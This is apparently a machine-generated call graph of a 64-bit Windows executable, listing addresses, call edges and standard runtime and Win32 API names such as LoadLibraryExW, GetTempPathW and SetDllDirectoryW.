16241 7ff6b751f659 16238->16241 16242 7ff6b7514f08 _get_daylight 11 API calls 16239->16242 16240->16201 16243 7ff6b751a948 __free_lconv_num 11 API calls 16241->16243 16242->16241 16243->16234 16245 7ff6b751f5ee GetCurrentDirectoryW 16244->16245 16245->16233 16245->16234 16247 7ff6b751f755 16246->16247 16248 7ff6b751f731 16246->16248 16251 7ff6b751f78f 16247->16251 16252 7ff6b751f7ae 16247->16252 16248->16247 16249 7ff6b751f736 16248->16249 16250 7ff6b7514f08 _get_daylight 11 API calls 16249->16250 16253 7ff6b751f73b 16250->16253 16254 7ff6b7514f08 _get_daylight 11 API calls 16251->16254 16263 7ff6b7514f4c 16252->16263 16256 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 16253->16256 16257 7ff6b751f794 16254->16257 16259 7ff6b751f746 16256->16259 16258 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 16257->16258 16260 7ff6b751f79f 16258->16260 16259->16007 16260->16007 16261 7ff6b75204dc 51 API calls 16262 7ff6b751f7bb 16261->16262 16262->16260 16262->16261 16264 7ff6b7514f6b 16263->16264 16265 7ff6b7514f70 16263->16265 16264->16262 16265->16264 16271 7ff6b751b150 GetLastError 16265->16271 16272 7ff6b751b191 FlsSetValue 16271->16272 16273 7ff6b751b174 FlsGetValue 16271->16273 16275 7ff6b751b1a3 16272->16275 16291 7ff6b751b181 16272->16291 16274 7ff6b751b18b 16273->16274 16273->16291 16274->16272 16277 7ff6b751eb98 _get_daylight 11 API calls 16275->16277 16276 7ff6b751b1fd SetLastError 16278 7ff6b7514f8b 16276->16278 16279 7ff6b751b21d 16276->16279 16280 7ff6b751b1b2 16277->16280 16293 7ff6b751d984 16278->16293 16301 7ff6b751a504 16279->16301 16282 7ff6b751b1d0 FlsSetValue 16280->16282 16283 7ff6b751b1c0 FlsSetValue 16280->16283 16284 7ff6b751b1dc FlsSetValue 16282->16284 16285 7ff6b751b1ee 16282->16285 16287 7ff6b751b1c9 16283->16287 16284->16287 16288 7ff6b751aef4 _get_daylight 11 API calls 16285->16288 16289 7ff6b751a948 __free_lconv_num 11 API calls 16287->16289 16290 7ff6b751b1f6 16288->16290 16289->16291 16292 7ff6b751a948 __free_lconv_num 11 API calls 16290->16292 16291->16276 16292->16276 16294 7ff6b7514fae 16293->16294 16295 7ff6b751d999 16293->16295 16297 7ff6b751d9f0 16294->16297 16295->16294 16345 7ff6b7523304 16295->16345 16298 7ff6b751da05 16297->16298 16300 7ff6b751da18 16297->16300 16298->16300 16358 7ff6b7522650 16298->16358 16300->16264 16310 7ff6b7523650 16301->16310 16336 7ff6b7523608 16310->16336 16341 7ff6b75202d8 EnterCriticalSection 16336->16341 16346 7ff6b751b150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16345->16346 16347 7ff6b7523313 16346->16347 16348 7ff6b752335e 16347->16348 16357 7ff6b75202d8 EnterCriticalSection 16347->16357 16348->16294 16359 7ff6b751b150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16358->16359 16360 7ff6b7522659 16359->16360 18930 7ff6b75216b0 18941 7ff6b75273e4 18930->18941 18942 7ff6b75273f1 18941->18942 18943 7ff6b751a948 __free_lconv_num 11 API calls 18942->18943 18944 7ff6b752740d 18942->18944 18943->18942 18945 7ff6b751a948 __free_lconv_num 11 API calls 18944->18945 18946 7ff6b75216b9 18944->18946 18945->18944 18947 7ff6b75202d8 EnterCriticalSection 18946->18947 20480 7ff6b752adfe 20481 7ff6b752ae17 20480->20481 20482 7ff6b752ae0d 20480->20482 20484 7ff6b7520338 LeaveCriticalSection 20482->20484 20247 7ff6b751f98c 20248 7ff6b751fb7e 20247->20248 20250 7ff6b751f9ce _isindst 20247->20250 20249 7ff6b7514f08 _get_daylight 11 API calls 20248->20249 20267 7ff6b751fb6e 20249->20267 20250->20248 20253 7ff6b751fa4e _isindst 20250->20253 20251 7ff6b750c550 _log10_special 8 API calls 20252 7ff6b751fb99 20251->20252 20268 7ff6b7526194 20253->20268 20258 7ff6b751fbaa 20260 7ff6b751a900 _isindst 17 API calls 20258->20260 20262 7ff6b751fbbe 20260->20262 20265 7ff6b751faab 20265->20267 20293 7ff6b75261d8 20265->20293 20267->20251 20269 7ff6b751fa6c 20268->20269 20270 7ff6b75261a3 20268->20270 20275 7ff6b7525598 20269->20275 20300 7ff6b75202d8 EnterCriticalSection 20270->20300 20276 7ff6b75255a1 20275->20276 20280 7ff6b751fa81 20275->20280 20277 7ff6b7514f08 _get_daylight 11 API calls 20276->20277 20278 7ff6b75255a6 20277->20278 20279 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 20278->20279 20279->20280 20280->20258 20281 7ff6b75255c8 20280->20281 20282 7ff6b751fa92 20281->20282 20283 7ff6b75255d1 20281->20283 20282->20258 20287 7ff6b75255f8 20282->20287 20284 7ff6b7514f08 _get_daylight 11 API calls 20283->20284 20285 7ff6b75255d6 20284->20285 20286 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 20285->20286 20286->20282 20288 7ff6b751faa3 20287->20288 20289 7ff6b7525601 20287->20289 20288->20258 20288->20265 20290 7ff6b7514f08 _get_daylight 11 API calls 20289->20290 20291 7ff6b7525606 20290->20291 20292 7ff6b751a8e0 _invalid_parameter_noinfo 37 API calls 20291->20292 20292->20288 20301 7ff6b75202d8 EnterCriticalSection 20293->20301 20494 7ff6b7515410 20495 7ff6b751541b 20494->20495 20503 7ff6b751f2a4 20495->20503 20516 7ff6b75202d8 EnterCriticalSection 20503->20516 18839 7ff6b750bae0 18840 7ff6b750bb0e 18839->18840 18841 7ff6b750baf5 18839->18841 18841->18840 18843 7ff6b751d5fc 12 API calls 18841->18843 18842 7ff6b750bb6e 18843->18842 18844 7ff6b7519961 18845 7ff6b751a3d8 45 API calls 18844->18845 18846 7ff6b7519966 18845->18846 18847 7ff6b75199d7 18846->18847 18848 7ff6b751998d GetModuleHandleW 18846->18848 18856 7ff6b7519864 18847->18856 18848->18847 18854 7ff6b751999a 18848->18854 18854->18847 18870 7ff6b7519a88 GetModuleHandleExW 18854->18870 18876 7ff6b75202d8 EnterCriticalSection 18856->18876 18871 7ff6b7519abc GetProcAddress 18870->18871 18872 7ff6b7519ae5 18870->18872 18875 7ff6b7519ace 18871->18875 18873 7ff6b7519aea FreeLibrary 18872->18873 18874 7ff6b7519af1 18872->18874 18873->18874 18874->18847 18875->18872 20517 7ff6b752abe3 20518 7ff6b752abf3 20517->20518 20521 7ff6b7515478 LeaveCriticalSection 20518->20521 20332 7ff6b752ad69 20335 7ff6b7515478 LeaveCriticalSection 20332->20335 16361 7ff6b750cc3c 16382 7ff6b750ce0c 16361->16382 16364 7ff6b750cd88 16536 7ff6b750d12c IsProcessorFeaturePresent 16364->16536 16365 7ff6b750cc58 __scrt_acquire_startup_lock 16367 7ff6b750cd92 16365->16367 16373 7ff6b750cc76 __scrt_release_startup_lock 16365->16373 16368 7ff6b750d12c 7 API calls 16367->16368 16370 7ff6b750cd9d __FrameHandler3::FrameUnwindToEmptyState 16368->16370 16369 7ff6b750cc9b 16371 7ff6b750cd21 16388 7ff6b750d274 16371->16388 16373->16369 16373->16371 16525 7ff6b7519b2c 16373->16525 16375 7ff6b750cd26 16391 7ff6b7501000 16375->16391 16379 7ff6b750cd49 16379->16370 16532 7ff6b750cf90 16379->16532 16383 7ff6b750ce14 16382->16383 16384 7ff6b750ce20 __scrt_dllmain_crt_thread_attach 16383->16384 16385 7ff6b750cc50 16384->16385 16386 7ff6b750ce2d 16384->16386 16385->16364 16385->16365 16386->16385 16543 7ff6b750d888 16386->16543 16389 7ff6b752a4d0 __scrt_get_show_window_mode 16388->16389 16390 7ff6b750d28b GetStartupInfoW 16389->16390 16390->16375 16392 7ff6b7501009 16391->16392 16570 7ff6b7515484 16392->16570 16394 7ff6b75037fb 16577 7ff6b75036b0 16394->16577 16399 7ff6b750c550 _log10_special 8 API calls 16402 7ff6b7503ca7 16399->16402 16400 7ff6b750383c 16737 7ff6b7501c80 16400->16737 16401 7ff6b750391b 16746 7ff6b75045c0 16401->16746 16530 7ff6b750d2b8 GetModuleHandleW 16402->16530 16405 7ff6b750385b 16649 7ff6b7508830 16405->16649 16408 7ff6b750396a 16769 7ff6b7502710 16408->16769 16410 7ff6b750388e 16418 7ff6b75038bb __std_exception_destroy 16410->16418 16741 7ff6b75089a0 16410->16741 16412 7ff6b750395d 16413 7ff6b7503984 16412->16413 16414 7ff6b7503962 16412->16414 16416 7ff6b7501c80 49 API calls 16413->16416 16765 7ff6b751004c 16414->16765 16419 7ff6b75039a3 16416->16419 16420 7ff6b7508830 14 API calls 16418->16420 16427 7ff6b75038de __std_exception_destroy 16418->16427 16424 7ff6b7501950 115 API calls 16419->16424 16420->16427 16422 7ff6b7503a0b 16423 7ff6b75089a0 40 API calls 16422->16423 16425 7ff6b7503a17 16423->16425 16426 7ff6b75039ce 16424->16426 16428 7ff6b75089a0 40 API calls 16425->16428 16426->16405 16429 7ff6b75039de 16426->16429 16433 7ff6b750390e __std_exception_destroy 16427->16433 16780 7ff6b7508940 16427->16780 16430 7ff6b7503a23 16428->16430 16431 7ff6b7502710 54 API calls 16429->16431 16432 7ff6b75089a0 40 API calls 16430->16432 16524 7ff6b7503808 __std_exception_destroy 16431->16524 16432->16433 16434 7ff6b7508830 14 API calls 16433->16434 16435 7ff6b7503a3b 16434->16435 16436 7ff6b7503b2f 16435->16436 16437 7ff6b7503a60 __std_exception_destroy 16435->16437 16438 7ff6b7502710 54 API calls 16436->16438 16439 7ff6b7508940 40 API calls 16437->16439 16450 7ff6b7503aab 16437->16450 16438->16524 16439->16450 16440 7ff6b7508830 14 API calls 16441 7ff6b7503bf4 __std_exception_destroy 16440->16441 16442 7ff6b7503d41 16441->16442 16443 7ff6b7503c46 16441->16443 16787 7ff6b75044e0 16442->16787 16444 7ff6b7503cd4 16443->16444 16445 7ff6b7503c50 16443->16445 16448 7ff6b7508830 14 API calls 16444->16448 16662 7ff6b75090e0 16445->16662 16452 7ff6b7503ce0 16448->16452 16449 7ff6b7503d4f 16453 7ff6b7503d65 16449->16453 16454 7ff6b7503d71 16449->16454 16450->16440 16455 7ff6b7503c61 16452->16455 16458 7ff6b7503ced 16452->16458 16790 7ff6b7504630 16453->16790 16457 7ff6b7501c80 49 API calls 16454->16457 16460 7ff6b7502710 54 API calls 16455->16460 16468 7ff6b7503cc8 __std_exception_destroy 16457->16468 16461 7ff6b7501c80 49 API calls 16458->16461 16460->16524 16464 7ff6b7503d0b 16461->16464 16462 7ff6b7503dc4 16712 7ff6b7509390 16462->16712 16467 7ff6b7503d12 16464->16467 16464->16468 16466 7ff6b7503dd7 SetDllDirectoryW 16472 7ff6b7503e0a 16466->16472 16514 7ff6b7503e5a 16466->16514 16471 7ff6b7502710 54 API calls 16467->16471 16468->16462 16469 7ff6b7503da7 SetDllDirectoryW LoadLibraryExW 16468->16469 16469->16462 16471->16524 16473 7ff6b7508830 14 API calls 16472->16473 16481 7ff6b7503e16 __std_exception_destroy 16473->16481 16474 7ff6b7504008 16476 7ff6b7504035 16474->16476 16477 7ff6b7504012 PostMessageW GetMessageW 16474->16477 16475 7ff6b7503f1b 16717 7ff6b75033c0 16475->16717 16867 7ff6b7503360 16476->16867 16477->16476 16484 7ff6b7503ef2 16481->16484 16488 7ff6b7503e4e 16481->16488 16487 7ff6b7508940 40 API calls 16484->16487 16487->16514 16488->16514 16793 7ff6b7506dc0 16488->16793 16514->16474 16514->16475 16524->16399 16526 7ff6b7519b43 16525->16526 16527 7ff6b7519b64 16525->16527 16526->16371 18834 7ff6b751a3d8 16527->18834 16531 7ff6b750d2c9 16530->16531 16531->16379 16534 7ff6b750cfa1 16532->16534 16533 7ff6b750cd60 16533->16369 16534->16533 16535 7ff6b750d888 7 API calls 16534->16535 16535->16533 16537 7ff6b750d152 __FrameHandler3::FrameUnwindToEmptyState __scrt_get_show_window_mode 16536->16537 16538 7ff6b750d171 RtlCaptureContext RtlLookupFunctionEntry 16537->16538 16539 7ff6b750d1d6 __scrt_get_show_window_mode 16538->16539 16540 7ff6b750d19a RtlVirtualUnwind 16538->16540 16541 7ff6b750d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16539->16541 16540->16539 16542 7ff6b750d256 __FrameHandler3::FrameUnwindToEmptyState 16541->16542 16542->16367 16544 7ff6b750d89a 16543->16544 16545 7ff6b750d890 16543->16545 16544->16385 16549 7ff6b750dc24 16545->16549 16550 7ff6b750d895 16549->16550 16551 7ff6b750dc33 16549->16551 16553 7ff6b750dc90 16550->16553 16557 7ff6b750de60 16551->16557 16554 7ff6b750dcbb 16553->16554 16555 7ff6b750dc9e DeleteCriticalSection 16554->16555 16556 7ff6b750dcbf 16554->16556 16555->16554 16556->16544 16561 7ff6b750dcc8 16557->16561 16562 7ff6b750ddb2 TlsFree 16561->16562 16564 7ff6b750dd0c __vcrt_InitializeCriticalSectionEx 16561->16564 16563 7ff6b750dd3a LoadLibraryExW 16566 7ff6b750ddd9 16563->16566 16567 7ff6b750dd5b GetLastError 16563->16567 16564->16562 16564->16563 16565 7ff6b750ddf9 GetProcAddress 16564->16565 16569 7ff6b750dd7d LoadLibraryExW 16564->16569 16565->16562 16566->16565 16568 7ff6b750ddf0 FreeLibrary 16566->16568 16567->16564 16568->16565 16569->16564 16569->16566 16573 7ff6b751f480 16570->16573 16571 7ff6b751f4d3 16572 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 16571->16572 16576 7ff6b751f4fc 16572->16576 16573->16571 16574 7ff6b751f526 16573->16574 16880 7ff6b751f358 16574->16880 16576->16394 16888 7ff6b750c850 16577->16888 16580 7ff6b7503710 16890 7ff6b7509280 FindFirstFileExW 16580->16890 16581 7ff6b75036eb GetLastError 16895 7ff6b7502c50 16581->16895 16584 7ff6b7503706 16589 7ff6b750c550 _log10_special 8 API calls 16584->16589 16586 7ff6b7503723 16910 7ff6b7509300 CreateFileW 16586->16910 16587 7ff6b750377d 16921 7ff6b7509440 16587->16921 16592 7ff6b75037b5 16589->16592 16591 7ff6b750378b 16591->16584 16597 7ff6b7502810 49 API calls 16591->16597 16592->16524 16599 7ff6b7501950 16592->16599 16594 7ff6b7503734 16913 7ff6b7502810 16594->16913 16595 7ff6b750374c __vcrt_InitializeCriticalSectionEx 16595->16587 16597->16584 16600 7ff6b75045c0 108 API calls 16599->16600 16601 7ff6b7501985 16600->16601 16602 7ff6b7501c43 16601->16602 16604 7ff6b7507f90 83 API calls 16601->16604 16603 7ff6b750c550 _log10_special 8 API calls 16602->16603 16605 7ff6b7501c5e 16603->16605 16606 7ff6b75019cb 16604->16606 16605->16400 16605->16401 16648 7ff6b7501a03 16606->16648 17285 7ff6b75106d4 16606->17285 16608 7ff6b751004c 74 API calls 16608->16602 16609 7ff6b75019e5 16610 7ff6b75019e9 16609->16610 16611 7ff6b7501a08 16609->16611 16613 7ff6b7514f08 _get_daylight 11 API calls 16610->16613 17289 7ff6b751039c 16611->17289 16614 7ff6b75019ee 16613->16614 17292 7ff6b7502910 16614->17292 16617 7ff6b7501a45 16622 7ff6b7501a5c 16617->16622 16623 7ff6b7501a7b 16617->16623 16618 7ff6b7501a26 16619 7ff6b7514f08 _get_daylight 11 API calls 16618->16619 16620 7ff6b7501a2b 16619->16620 16621 7ff6b7502910 54 API calls 16620->16621 16621->16648 16625 7ff6b7514f08 _get_daylight 11 API calls 16622->16625 16624 7ff6b7501c80 49 API calls 16623->16624 16627 7ff6b7501a92 16624->16627 16626 7ff6b7501a61 16625->16626 16628 7ff6b7502910 54 API calls 16626->16628 16629 7ff6b7501c80 49 API calls 16627->16629 16628->16648 16630 7ff6b7501add 16629->16630 16631 7ff6b75106d4 73 API calls 16630->16631 16632 7ff6b7501b01 16631->16632 16633 7ff6b7501b35 16632->16633 16634 7ff6b7501b16 16632->16634 16635 7ff6b751039c _fread_nolock 53 API calls 16633->16635 16636 7ff6b7514f08 _get_daylight 11 API calls 16634->16636 16637 7ff6b7501b4a 16635->16637 16638 7ff6b7501b1b 16636->16638 16639 7ff6b7501b50 16637->16639 16640 7ff6b7501b6f 16637->16640 16641 7ff6b7502910 54 API calls 16638->16641 16642 7ff6b7514f08 _get_daylight 11 API calls 16639->16642 17307 7ff6b7510110 16640->17307 16641->16648 16644 7ff6b7501b55 16642->16644 16646 7ff6b7502910 54 API calls 16644->16646 16646->16648 16647 7ff6b7502710 54 API calls 16647->16648 16648->16608 16650 7ff6b750883a 16649->16650 16651 7ff6b7509390 2 API calls 16650->16651 16652 7ff6b7508859 GetEnvironmentVariableW 16651->16652 16653 7ff6b7508876 ExpandEnvironmentStringsW 16652->16653 16654 7ff6b75088c2 16652->16654 16653->16654 16655 7ff6b7508898 16653->16655 16656 7ff6b750c550 _log10_special 8 API calls 16654->16656 16658 7ff6b7509440 2 API calls 16655->16658 16657 7ff6b75088d4 16656->16657 16657->16410 16659 7ff6b75088aa 16658->16659 16660 7ff6b750c550 _log10_special 8 API calls 16659->16660 16661 7ff6b75088ba 16660->16661 16661->16410 16663 7ff6b75090f5 16662->16663 17525 7ff6b7508570 GetCurrentProcess OpenProcessToken 16663->17525 16666 7ff6b7508570 7 API calls 16667 7ff6b7509121 16666->16667 16668 7ff6b750913a 16667->16668 16669 7ff6b7509154 16667->16669 16670 7ff6b75026b0 48 API calls 16668->16670 16671 7ff6b75026b0 48 API calls 16669->16671 16672 7ff6b7509152 16670->16672 16673 7ff6b7509167 LocalFree LocalFree 16671->16673 16672->16673 16674 7ff6b7509183 16673->16674 16676 7ff6b750918f 16673->16676 17535 7ff6b7502b50 16674->17535 16677 7ff6b750c550 _log10_special 8 API calls 16676->16677 16678 7ff6b7503c55 16677->16678 16678->16455 16679 7ff6b7508660 16678->16679 16680 7ff6b7508678 16679->16680 16681 7ff6b75086fa GetTempPathW GetCurrentProcessId 16680->16681 16682 7ff6b750869c 16680->16682 17544 7ff6b75025c0 16681->17544 16684 7ff6b7508830 14 API calls 16682->16684 16685 7ff6b75086a8 16684->16685 17551 7ff6b75081d0 16685->17551 16692 7ff6b7508728 __std_exception_destroy 16698 7ff6b7508765 __std_exception_destroy 16692->16698 17548 7ff6b7518b68 16692->17548 16713 7ff6b75093b2 MultiByteToWideChar 16712->16713 16716 7ff6b75093d6 16712->16716 16714 7ff6b75093ec __std_exception_destroy 16713->16714 16713->16716 16714->16466 16715 7ff6b75093f3 MultiByteToWideChar 16715->16714 16716->16714 16716->16715 16729 7ff6b75033ce __scrt_get_show_window_mode 16717->16729 16718 7ff6b750c550 _log10_special 8 API calls 16720 7ff6b7503664 16718->16720 16719 7ff6b75035c7 16719->16718 16720->16524 16736 7ff6b75090c0 LocalFree 16720->16736 16722 7ff6b7501c80 49 API calls 16722->16729 16723 7ff6b75035e2 16725 7ff6b7502710 54 API calls 16723->16725 16725->16719 16728 7ff6b75035c9 16731 7ff6b7502710 54 API calls 16728->16731 16729->16719 16729->16722 16729->16723 16729->16728 16730 7ff6b7502a50 54 API calls 16729->16730 16734 7ff6b75035d0 16729->16734 17740 7ff6b7504560 16729->17740 17746 7ff6b7507e20 16729->17746 17758 7ff6b7501600 16729->17758 17806 7ff6b7507120 16729->17806 17810 7ff6b7504190 16729->17810 17854 7ff6b7504450 16729->17854 16730->16729 16731->16719 16735 7ff6b7502710 54 API calls 16734->16735 16735->16719 16738 7ff6b7501ca5 16737->16738 16739 7ff6b7514984 49 API calls 16738->16739 16740 7ff6b7501cc8 16739->16740 16740->16405 16742 7ff6b7509390 2 API calls 16741->16742 16743 7ff6b75089b4 16742->16743 16744 7ff6b7518238 38 API calls 16743->16744 16745 7ff6b75089c6 __std_exception_destroy 16744->16745 16745->16418 16747 7ff6b75045cc 16746->16747 16748 7ff6b7509390 2 API calls 16747->16748 16749 7ff6b75045f4 16748->16749 16750 7ff6b7509390 2 API calls 16749->16750 16751 7ff6b7504607 16750->16751 18021 7ff6b7515f94 16751->18021 16754 7ff6b750c550 _log10_special 8 API calls 16755 7ff6b750392b 16754->16755 16755->16408 16756 7ff6b7507f90 16755->16756 16757 7ff6b7507fb4 16756->16757 16758 7ff6b75106d4 73 API calls 16757->16758 16759 7ff6b750808b __std_exception_destroy 16757->16759 16760 7ff6b7507fd0 16758->16760 16759->16412 16760->16759 18413 7ff6b75178c8 16760->18413 16762 7ff6b75106d4 73 API calls 16764 7ff6b7507fe5 16762->16764 16763 7ff6b751039c _fread_nolock 53 API calls 16763->16764 16764->16759 16764->16762 16764->16763 16766 7ff6b751007c 16765->16766 18428 7ff6b750fe28 16766->18428 16768 7ff6b7510095 16768->16408 16770 7ff6b750c850 16769->16770 16771 7ff6b7502734 GetCurrentProcessId 16770->16771 16772 7ff6b7501c80 49 API calls 16771->16772 16773 7ff6b7502787 16772->16773 16774 7ff6b7514984 49 API calls 16773->16774 16775 7ff6b75027cf 16774->16775 16776 7ff6b7502620 12 API calls 16775->16776 16777 7ff6b75027f1 16776->16777 16778 7ff6b750c550 _log10_special 8 API calls 16777->16778 16779 7ff6b7502801 16778->16779 16779->16524 16781 7ff6b7509390 2 API calls 16780->16781 16782 7ff6b750895c 16781->16782 16783 7ff6b7509390 2 API calls 16782->16783 16784 7ff6b750896c 16783->16784 16785 7ff6b7518238 38 API calls 16784->16785 16786 7ff6b750897a __std_exception_destroy 16785->16786 16786->16422 16788 7ff6b7501c80 49 API calls 16787->16788 16789 7ff6b75044fd 16788->16789 16789->16449 16791 7ff6b7501c80 49 API calls 16790->16791 16792 7ff6b7504660 16791->16792 16792->16468 16794 7ff6b7506dd5 16793->16794 16795 7ff6b7503e6c 16794->16795 16796 7ff6b7514f08 _get_daylight 11 API calls 16794->16796 16799 7ff6b7507340 16795->16799 16797 7ff6b7506de2 16796->16797 16798 7ff6b7502910 54 API calls 16797->16798 16798->16795 18439 7ff6b7501470 16799->18439 18545 7ff6b7506360 16867->18545 16887 7ff6b751546c EnterCriticalSection 16880->16887 16889 7ff6b75036bc GetModuleFileNameW 16888->16889 16889->16580 16889->16581 16891 7ff6b75092bf FindClose 16890->16891 16892 7ff6b75092d2 16890->16892 16891->16892 16893 7ff6b750c550 _log10_special 8 API calls 16892->16893 16894 7ff6b750371a 16893->16894 16894->16586 16894->16587 16896 7ff6b750c850 16895->16896 16897 7ff6b7502c70 GetCurrentProcessId 16896->16897 16926 7ff6b75026b0 16897->16926 16899 7ff6b7502cb9 16930 7ff6b7514bd8 16899->16930 16902 7ff6b75026b0 48 API calls 16903 7ff6b7502d34 FormatMessageW 16902->16903 16905 7ff6b7502d7f MessageBoxW 16903->16905 16906 7ff6b7502d6d 16903->16906 16908 7ff6b750c550 _log10_special 8 API calls 16905->16908 16907 7ff6b75026b0 48 API calls 16906->16907 16907->16905 16909 7ff6b7502daf 16908->16909 16909->16584 16911 7ff6b7503730 16910->16911 16912 7ff6b7509340 GetFinalPathNameByHandleW CloseHandle 16910->16912 16911->16594 16911->16595 16912->16911 16914 7ff6b7502834 16913->16914 16915 7ff6b75026b0 48 API calls 16914->16915 16916 7ff6b7502887 16915->16916 16917 7ff6b7514bd8 48 API calls 16916->16917 16918 7ff6b75028d0 MessageBoxW 16917->16918 16919 7ff6b750c550 _log10_special 8 API calls 16918->16919 16920 7ff6b7502900 16919->16920 16920->16584 16922 7ff6b750946a WideCharToMultiByte 16921->16922 16923 7ff6b7509495 16921->16923 16922->16923 16925 7ff6b75094ab __std_exception_destroy 16922->16925 16924 7ff6b75094b2 WideCharToMultiByte 16923->16924 16923->16925 16924->16925 16925->16591 16927 7ff6b75026d5 16926->16927 16928 7ff6b7514bd8 48 API calls 16927->16928 16929 7ff6b75026f8 16928->16929 16929->16899 16933 7ff6b7514c32 16930->16933 16931 7ff6b7514c57 16932 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 16931->16932 16936 7ff6b7514c81 16932->16936 16933->16931 16934 7ff6b7514c93 16933->16934 16948 7ff6b7512f90 16934->16948 16938 7ff6b750c550 _log10_special 8 API calls 16936->16938 16937 7ff6b7514d74 16939 7ff6b751a948 __free_lconv_num 11 API calls 16937->16939 16940 7ff6b7502d04 16938->16940 16939->16936 16940->16902 16942 7ff6b7514d49 16944 7ff6b751a948 __free_lconv_num 11 API calls 16942->16944 16943 7ff6b7514d9a 16943->16937 16946 7ff6b7514da4 16943->16946 16944->16936 16945 7ff6b7514d40 16945->16937 16945->16942 16947 7ff6b751a948 __free_lconv_num 11 API calls 16946->16947 16947->16936 16949 7ff6b7512fce 16948->16949 16950 7ff6b7512fbe 16948->16950 16951 7ff6b7512fd7 16949->16951 16956 7ff6b7513005 16949->16956 16954 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 16950->16954 16952 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 16951->16952 16953 7ff6b7512ffd 16952->16953 16953->16937 16953->16942 16953->16943 16953->16945 16954->16953 16956->16950 16956->16953 16959 7ff6b75139a4 16956->16959 16992 7ff6b75133f0 16956->16992 17029 7ff6b7512b80 16956->17029 16960 7ff6b75139e6 16959->16960 16961 7ff6b7513a57 16959->16961 16962 7ff6b75139ec 16960->16962 16963 7ff6b7513a81 16960->16963 16964 7ff6b7513a5c 16961->16964 16965 7ff6b7513ab0 16961->16965 16966 7ff6b7513a20 16962->16966 16967 7ff6b75139f1 16962->16967 17052 7ff6b7511d54 16963->17052 16968 7ff6b7513a5e 16964->16968 16969 7ff6b7513a91 16964->16969 16971 7ff6b7513ac7 16965->16971 16973 7ff6b7513aba 16965->16973 16978 7ff6b7513abf 16965->16978 16974 7ff6b75139f7 16966->16974 16966->16978 16967->16971 16967->16974 16972 7ff6b7513a00 16968->16972 16981 7ff6b7513a6d 16968->16981 17059 7ff6b7511944 16969->17059 17066 7ff6b75146ac 16971->17066 16990 7ff6b7513af0 16972->16990 17032 7ff6b7514158 16972->17032 16973->16963 16973->16978 16974->16972 16979 7ff6b7513a32 16974->16979 16987 7ff6b7513a1b 16974->16987 16978->16990 17070 7ff6b7512164 16978->17070 16979->16990 17042 7ff6b7514494 16979->17042 16981->16963 16983 7ff6b7513a72 16981->16983 16983->16990 17048 7ff6b7514558 16983->17048 16984 7ff6b750c550 _log10_special 8 API calls 16985 7ff6b7513dea 16984->16985 16985->16956 16987->16990 16991 7ff6b7513cdc 16987->16991 17077 7ff6b75147c0 16987->17077 16990->16984 16991->16990 17083 7ff6b751ea08 16991->17083 16993 7ff6b75133fe 16992->16993 16994 7ff6b7513414 16992->16994 16995 7ff6b7513454 16993->16995 16996 7ff6b75139e6 16993->16996 16997 7ff6b7513a57 16993->16997 16994->16995 16998 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 16994->16998 16995->16956 16999 7ff6b75139ec 16996->16999 17000 7ff6b7513a81 16996->17000 17001 7ff6b7513a5c 16997->17001 17002 7ff6b7513ab0 16997->17002 16998->16995 17003 7ff6b7513a20 16999->17003 17004 7ff6b75139f1 16999->17004 17006 7ff6b7511d54 38 API calls 17000->17006 17005 7ff6b7513a91 17001->17005 17011 7ff6b7513a5e 17001->17011 17007 7ff6b7513ac7 17002->17007 17008 7ff6b7513aba 17002->17008 17010 7ff6b7513abf 17002->17010 17003->17010 17014 7ff6b75139f7 17003->17014 17004->17007 17004->17014 17012 7ff6b7511944 38 API calls 17005->17012 17024 7ff6b7513a1b 17006->17024 17009 7ff6b75146ac 45 API calls 17007->17009 17008->17000 17008->17010 17009->17024 17016 7ff6b7512164 38 API calls 17010->17016 17027 7ff6b7513af0 17010->17027 17017 7ff6b7513a6d 17011->17017 17018 7ff6b7513a00 17011->17018 17012->17024 17013 7ff6b7514158 47 API calls 17013->17024 17015 7ff6b7513a32 17014->17015 17014->17018 17014->17024 17019 7ff6b7514494 46 API calls 17015->17019 17015->17027 17016->17024 17017->17000 17020 7ff6b7513a72 17017->17020 17018->17013 17018->17027 17019->17024 17022 7ff6b7514558 37 API calls 17020->17022 17020->17027 17021 7ff6b750c550 _log10_special 8 API calls 17023 7ff6b7513dea 17021->17023 17022->17024 17023->16956 17025 7ff6b75147c0 45 API calls 17024->17025 17024->17027 17028 7ff6b7513cdc 17024->17028 17025->17028 17026 7ff6b751ea08 46 API calls 17026->17028 17027->17021 17028->17026 17028->17027 17268 7ff6b7510fc8 17029->17268 17033 7ff6b751417e 17032->17033 17095 7ff6b7510b80 17033->17095 17038 7ff6b75142c3 17040 7ff6b75147c0 45 API calls 17038->17040 17041 7ff6b7514351 17038->17041 17039 7ff6b75147c0 45 API calls 17039->17038 17040->17041 17041->16987 17043 7ff6b75144c9 17042->17043 17044 7ff6b75144e7 17043->17044 17045 7ff6b751450e 17043->17045 17046 7ff6b75147c0 45 API calls 17043->17046 17047 7ff6b751ea08 46 API calls 17044->17047 17045->16987 17046->17044 17047->17045 17049 7ff6b7514579 17048->17049 17050 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17049->17050 17051 7ff6b75145aa 17049->17051 17050->17051 17051->16987 17053 7ff6b7511d87 17052->17053 17054 7ff6b7511db6 17053->17054 17056 7ff6b7511e73 17053->17056 17058 7ff6b7511df3 17054->17058 17238 7ff6b7510c28 17054->17238 17057 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17056->17057 17057->17058 17058->16987 17060 7ff6b7511977 17059->17060 17061 7ff6b75119a6 17060->17061 17063 7ff6b7511a63 17060->17063 17062 7ff6b7510c28 12 API calls 17061->17062 17065 7ff6b75119e3 17061->17065 17062->17065 17064 7ff6b751a814 _invalid_parameter_noinfo 37 API calls 17063->17064 17064->17065 17065->16987 17067 7ff6b75146ef 17066->17067 17069 7ff6b75146f3 __crtLCMapStringW 17067->17069 17246 7ff6b7514748 17067->17246 17069->16987 17071 7ff6b7512197 17070->17071 17072 7ff6b75121c6 17071->17072 17074 